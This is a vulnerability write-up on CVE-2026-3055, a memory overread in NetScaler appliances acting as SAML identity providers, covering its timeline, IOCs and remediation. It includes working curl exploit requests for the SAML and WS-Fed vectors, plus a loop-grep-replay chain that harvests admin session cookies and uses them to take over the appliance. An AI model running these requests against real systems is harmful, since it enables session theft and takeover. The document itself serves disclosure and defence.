Citrix Bleed 3: CVE-2026-3055 — Unauthenticated Memory Leak in NetScaler ADC/Gateway

A critical vulnerability in Citrix NetScaler allows unauthenticated attackers to dump sensitive memory contents — including admin session tokens — with a single HTTP request. No credentials, no exploits, no brute force. Just a crafted URL.

Overview

On March 23, 2026, Citrix published advisory CTX696300 addressing a critical out-of-bounds read vulnerability tracked as CVE-2026-3055 (CVSS 9.3). The flaw exists in NetScaler ADC and NetScaler Gateway appliances configured as SAML Identity Providers (SAML IDP).

By March 27, watchTowr Labs detected active exploitation in the wild. By March 30, CISA added it to the Known Exploited Vulnerabilities (KEV) catalog with a remediation deadline of April 2, 2026. By March 31, a Metasploit module had been publicly released.

watchTowr Labs demonstrated that an unauthenticated attacker can leak kilobytes of raw memory per request — including authenticated administrative session IDs — enabling full appliance takeover with a single curl.

Vulnerability Classification

Affected Products & Versions

This affects customer-managed (on-premise) NetScaler appliances only. Citrix-managed cloud instances are not affected. The appliance must be configured as a SAML Identity Provider (SAML IDP) — default installations are not vulnerable.

To check if your appliance is affected, run the following on the NetScaler CLI:

grep "add authentication samlIdPProfile" ns.conf

If this command returns any results, the appliance has SAML IDP configured and is potentially vulnerable.

Technical Deep Dive

CVE-2026-3055 is not a single bug. watchTowr Labs identified at least two distinct memory overread vectors sharing the same CVE. The root cause is the same in both cases: the NetScaler fails to validate whether certain input fields contain actual data before processing them.

Here’s the high-level picture of how both vectors work:

                         Attacker (unauthenticated)
                                |
                     +----------+-----------+
                     |                      |
              Vector 1: SAML          Vector 2: WS-Fed
             POST /saml/login      GET /wsfed/passive?wctx
                     |                      |
                     v                      v
          Missing ACS URL field     Empty wctx param (no "=")
          in SAMLRequest            in query string
                     |                      |
                     +----------+-----------+
                                |
                                v
                    NetScaler skips validation
                    on empty/missing field
                                |
                                v
                    Reads uninitialized heap memory
                    (leftover from prior requests)
                                |
                                v
                    Leaks memory in HTTP response:
                    - Other users' session cookies
                    - HTTP headers with auth tokens
                    - Internal network metadata
                    - Binary heap structures

Vector 1: SAML Login Endpoint (/saml/login)

This vector targets the SAML authentication flow. A normal SAML authentication request includes an AssertionConsumerServiceURL field that gets echoed back to the user in the NSC_TASS cookie.

The flaw: If AssertionConsumerServiceURL is omitted from the request, the NetScaler does not check for its absence. Instead, it reads whatever data happens to be in that memory region — dead heap memory left over from prior requests.

curl -s -X POST "https://TARGET/saml/login" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  --data-urlencode 'SAMLRequest=<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_1" Version="2.0" ProviderName="provider" Destination="https://attacker.com/saml.php" ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST"><saml:Issuer>https://attacker.com/saml.php</saml:Issuer></samlp:AuthnRequest>' \
  -v -k 2>&1 | grep -i "NSC_TASS"

Vulnerable response — the NSC_TASS cookie contains dead memory:

< Set-Cookie: NSC_TASS=eyJpZCI6Il8xIiwiYmluZCI6InBvc3QiLCJBQ1NVUkwiOiLihp...

Patched response — rejected outright:

Parsing of presented Assertion failed; Please contact your administrator

The leaked memory in the cookie is base64-encoded. Decoding it reveals fragments like:

ID=_1&bind=post&ACSURL=0xDEADBEEF...

The 0xDEADBEEF markers are classic uninitialized memory signatures. You can also get fragments of HTTP headers from other users’ sessions.

Caveat: This vector has a ~100 byte per-field limit and terminates on NULL bytes, making it less reliable but still dangerous on high-traffic appliances.

Vector 2: WS-Federation Endpoint (/wsfed/passive?wctx)

This vector is the more severe of the two. It targets the WS-Federation passive endpoint, and the underlying logic flaw is remarkably simple.

The flaw: The NetScaler checks for the presence of the wctx query parameter but never checks whether it has an actual value. When wctx is present with no value and no = sign, the appliance dereferences an uninitialized buffer pointing to dead memory.

curl -s -k "https://TARGET/wsfed/passive?wctx" -v 2>&1

A single GET request — no body, no authentication, no credentials. The response body contains kilobytes of raw memory leaked from the appliance heap.

Leaked Data

The leaked memory is dynamic — repeated requests return different contents. watchTowr observed data such as:

...Host: admin.vpn.target-corp.com
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: NSC_AAAC=abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJ...
Citrix-ns-orig-srcip: 10.0.1.45...

End-to-End Session Hijacking

watchTowr demonstrated the full chain:

while true; do
  curl -s -k "https://TARGET/wsfed/passive?wctx" >> leaked_memory.bin
done

strings leaked_memory.bin | grep -oP 'NSC_AAAC=[A-Za-z0-9+/=]+' | sort -u

curl -s -k "https://TARGET/menu/ss" \
  -H "Cookie: NSC_AAAC=<STOLEN_SESSION_TOKEN>" \
  -o admin_dashboard.html

The result: full administrative access to the NetScaler appliance. An attacker can then:
- Export the entire configuration (VPN settings, certificates, policies)
- Create backdoor accounts
- Modify authentication flows
- Pivot into the internal network

Attack Timeline

Reconnaissance Indicators

Attackers follow a two-phase approach:

Phase 1: Fingerprinting

curl -s -k "https://TARGET/cgi/GetAuthMethods"

This endpoint enumerates which authentication flows are enabled — allowing attackers to confirm SAML IDP is configured before attempting exploitation.

Phase 2: Exploitation Attempts

curl -s -X POST "https://TARGET/saml/login" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  --data-urlencode 'SAMLRequest=<minimal payload>'

curl -s -k "https://TARGET/wsfed/passive?wctx"

Indicators of Compromise (IOCs)

Monitor /var/log/ns.log (with DEBUG logging enabled) for these patterns:

<Debug> SAML ProtocolBinding parsing failed: "urn:oasis:names:tc:SAML:2.0:bindings:HTT"
<Debug> acs=[0xDEADBEEF...] or acs contains non-ASCII
GET /wsfed/passive?wctx HTTP/1.1
POST /saml/login (missing AssertionConsumerServiceURL)
GET /cgi/GetAuthMethods (reconnaissance)

Network-level indicators:
- Repeated GET /wsfed/passive?wctx from the same source IP
- Repeated POST /saml/login with minimal SAMLRequest payloads
- GET /cgi/GetAuthMethods followed by exploitation attempts

Remediation

Immediate Actions

grep "add authentication samlIdPProfile" ns.conf
show ns version

Upgrade Paths

If Patching Is Not Immediately Possible

rm authentication samlIdPProfile <profile-name>
set ns param -cookieEncryption ENABLED
kill cmsession -force

Post-Incident Checks

grep -i "wsfed/passive" /var/log/ns.log
grep -i "GetAuthMethods" /var/log/ns.log
grep -i "saml/login" /var/log/ns.log | grep -v "AssertionConsumerServiceURL"
who
show runningconfig

Context: The Citrix Bleed Legacy

This vulnerability follows a well-established pattern of memory disclosure bugs in NetScaler:

The pattern is consistent across all three incidents: a crafted HTTP request leaks session tokens from memory, which are then used to hijack authenticated sessions. Threat actors have demonstrated the ability to exploit Citrix vulnerabilities within days of disclosure — this time, it took four days.

Citrix Bleed (2023)     →  leak memory  →  steal tokens  →  hijack sessions
Citrix Bleed 2 (2025)   →  leak memory  →  steal tokens  →  hijack sessions
Citrix Bleed 3 (2026)   →  leak memory  →  steal tokens  →  hijack sessions
                                                       ↑
                                            Same bug, different endpoint

Key Takeaways

1. Patch now if your NetScaler is a SAML IDP. This is being actively exploited.
2. The exploit is trivial. No auth, no brute force, no complex tooling. One curl leaks memory.
3. Network segmentation matters. Don’t expose NetScaler to the public internet without strict access controls.
4. Monitor your logs. The recon and exploitation patterns are detectable — if you’re logging at DEBUG level.
5. Rotate credentials if there’s any chance your appliance was exposed. Leaked session tokens persist even after patching.
6. This keeps happening. Third “Citrix Bleed” in three years. If you run NetScaler, build a rapid patching pipeline.

Sources

1. Citrix Advisory CTX696300 — NetScaler ADC and NetScaler Gateway Security Bulletin for CVE-2026-3055 and CVE-2026-4368
2. watchTowr Labs — Part 1 — “The sequels are never as good, but we’re still in pain: Citrix NetScaler CVE-2026-3055 Memory Overread.” https://labs.watchtowr.com/the-sequels-are-never-as-good-but-were-still-in-pain-citrix-netscaler-cve-2026-3055-memory-overread/
3. watchTowr Labs — Part 2 — “Please, we beg, just one weekend free of appliances: Citrix NetScaler CVE-2026-3055 Memory Overread Part 2.” https://labs.watchtowr.com/please-we-beg-just-one-weekend-free-of-appliances-citrix-netscaler-cve-2026-3055-memory-overread-part-2/
4. The Hacker News (Mar 24) — “Citrix Urges Patching Critical NetScaler Flaw Allowing Unauthenticated Data Leaks.” https://thehackernews.com/2026/03/citrix-urges-patching-critical.html
5. The Hacker News (Mar 28) — “Citrix NetScaler Under Active Recon for CVE-2026-3055 (CVSS 9.3) Memory Overread Bug.” https://thehackernews.com/2026/03/citrix-netscaler-under-active-recon-for.html
6. Cybersecurity News — “CISA Warns of Citrix NetScaler Vulnerability Actively Exploited in Attacks.” https://cybersecuritynews.com/citrix-netscaler-vulnerability-exploited/
7. SecurityWeek — “Exploitation of Fresh Citrix NetScaler Vulnerability Begins.” https://www.securityweek.com/exploitation-of-fresh-citrix-netscaler-vulnerability-begins/
8. SecurityOnline — “Citrix NetScaler ADC & Gateway (CVE-2026-3055) — CISA KEV.” https://securityonline.info/citrix-netscaler-adc-gateway-cve-2026-3055-cisa-kev/
9. Rapid7 ETR — “ETR: CVE-2026-3055 — Citrix NetScaler ADC and NetScaler Gateway Out-of-Bounds Read.” https://www.rapid7.com/blog/post/etr-cve-2026-3055-citrix-netscaler-adc-and-netscaler-gateway-out-of-bounds-read/
10. CISA KEV Catalog — CVE-2026-3055 added March 30, 2026. https://www.cisa.gov/known-exploited-vulnerabilities-catalog
11. CVE-2026-3055 Record — https://nvd.nist.gov/vuln/detail/CVE-2026-3055
12. Metasploit Module PR #21204 — Rapid7 Metasploit Framework. https://github.com/rapid7/metasploit-framework/pull/21204

Published: March 31, 2026